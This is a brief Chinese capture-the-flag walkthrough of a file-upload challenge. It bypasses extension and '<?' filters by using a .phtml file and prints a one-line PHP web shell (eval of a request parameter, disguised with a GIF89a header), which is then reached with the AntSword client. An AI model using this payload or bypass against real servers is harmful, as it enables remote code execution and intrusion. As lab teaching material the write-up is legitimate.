1、打开链接
2、这是一个文件上传题,尝试上传一个php文件,无法成功上传
3、尝试上传jpg文件,上传成功
4、使用burpsuite抓包绕过,后缀php、php3、php4、php5、phtm、phtml
5、发现只有phtml成功,但是不能存在 <?
6、更换一句话木马语句:
GIF89a? <script language="php">eval($_REQUEST[1])</script>
7、上传的文件一般存放在upload文件夹下
8、使用蚁剑连接
9、进入文件管理,找到flag